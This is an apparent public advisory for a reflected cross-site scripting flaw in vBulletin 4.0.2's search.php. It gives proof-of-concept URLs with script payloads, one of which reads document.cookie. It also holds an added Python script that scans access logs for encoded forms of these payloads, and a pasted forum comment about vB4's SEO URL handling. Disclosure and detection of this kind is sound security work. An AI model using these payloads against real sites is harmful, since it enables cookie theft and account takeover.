Cross Site Scripting Vulnerability for Internet Brands vBulletin 4.0.2 Patch Level 1

Vendor: Internet Brands (Nasdaq: INET)
Software: vBulletin
Version: 4.0.2 Patch Level 1
Type: Cross Site Scripting

[+] Discovered By: 5ubzer0
[+] My id : http://inj3ct0r.com/author/2307
[+] Original : http://inj3ct0r.com/exploits/9697
# Version: vBulletin 4.0.2

www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query="><script>alert('xss');</script>
www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query="><script>alert(document.cookie);</script>
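
Added example, not part of the original advisory: a triage script that scans web server access logs for search.php requests whose query parameter carries markup like the requests above, including percent-encoded and double-encoded forms. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Markup in a search term: a quote followed by '>' (attribute breakout) or a tag opener.
MARKUP = re.compile(r"""["']\s*>|<[a-z!/]""", re.I)

# Constructed sample lines: documentation IPs, made-up timestamps and sizes.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query=upgrade+notes HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2010:10:00:05 +0000] "GET /path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query=%22%3E%3Cscript%3Ealert(%27xss%27)%3B%3C/script%3E HTTP/1.1" 200 5342',
    '198.51.100.7 - - [01/Jan/2010:10:00:09 +0000] "GET /path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query=%2522%253E%253Cscript%253Ealert(document.cookie)%253B%253C%252Fscript%253E HTTP/1.1" 200 5342',
    '192.0.2.44 - - [01/Jan/2010:10:00:12 +0000] "GET /path/showthread.php?t=1&query=%3Cb%3E HTTP/1.1" 200 900',
]

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding, e.g. %253C -> %3C -> <."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_reflected_markup(log_lines):
    """Return (line_number, decoded_term) for search.php requests with markup in 'query'."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith("/search.php"):
            continue  # only the endpoint named in the advisory
        # parse_qs decodes once; fully_decode strips any further encoding layers.
        for raw in parse_qs(url.query, keep_blank_values=True).get("query", []):
            term = fully_decode(raw)
            if MARKUP.search(term):
                hits.append((number, term))
    return hits

if __name__ == "__main__":
    for number, term in find_reflected_markup(SAMPLE_LOG):
        print(f"line {number}: suspicious search term {term!r}")
```

A hit means markup was submitted, not that it was reflected unescaped; confirm against the response or the installed version before treating it as an incident.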
  • http://www.vbulletin.com/forum/project.php?issueid=37797 friendly urls in vb4

    this is not a comment, but I wanted to inform you guys of yet another serious, dead serious bug on vb4

    here is the copy paste work

    -----

    A serious bug in SEO-ed URLs in vB4.

    Look at the first original URL

    [URL]http://www.vbulletin.com/forum/showthread.php?349143-Hello-to-the-vBulletin-community[/URL]

    and the modified one

    [URL]http://www.vbulletin.com/forum/showthread.php?349143-OK-Fabian-fix-the-damn-thing-cause-it-sucks[/URL]

    The manually modified URL leads to the same page, providing the thread ID remains after showthread.php?

    How vB devs could allow something like that to go unnoticed is beyond me. This can have serious implications on forum rankings, forum reputation and a whole range of other things. In short, hell breaks loose.

    This might have been known for a long time, but I thought it’s worth sharing.

    -----